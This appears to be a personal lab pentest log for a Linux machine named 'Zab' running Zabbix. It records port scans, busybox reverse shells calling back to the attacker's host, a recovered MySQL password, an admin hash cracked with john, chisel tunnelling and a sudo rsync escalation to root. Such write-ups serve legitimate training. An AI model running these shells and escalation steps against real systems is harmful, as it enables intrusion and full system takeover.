🧪 Pentest Log: {{date:2025-08-19}}

🔍 Target Information

• Machine Name: Zab
• IP Address: 192.168.217.210
• Operating System: Linux

ip=192.168.217.210

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 6789

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 6789
• Vulnerability Type: N/A

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

In the web console

busybox 192.168.45.163 80 -e /bin/bash

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: 33(www-data)
• Shell Type: reverse shell

🔍 Enumeration

Writeable Path

find / -type d -maxdepth 5 -writable 2>/dev/null

Found

/etc/zabbix/web

Obtain MySql credential

zabbix:breadandbuttereater121

Retrieve admin hash

$2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si.

Crack it using john

john hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'

Admin:dinosaur

Using chisel to forward localhost port 80 to 54321

chisel server -socks5 -reverse

./chisel client -fingerprint '06X3oW7mW/ytPBvdgtlRKny9eP3WLCAenGD4aqmKfz4=' 192.168.45.163:8080 R:54321:127.0.0.1:80

Go to zabbix dashboard, create a new script

busybox nc 192.168.45.163 22 -e /bin/bash

Check sudo privilege

sudo -l

Found

User zabbix may run the following commands on zab:
    (ALL : ALL) NOPASSWD: /usr/bin/rsync

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Abuse
• Target Binary/Service: rsync
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Smash to root

sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null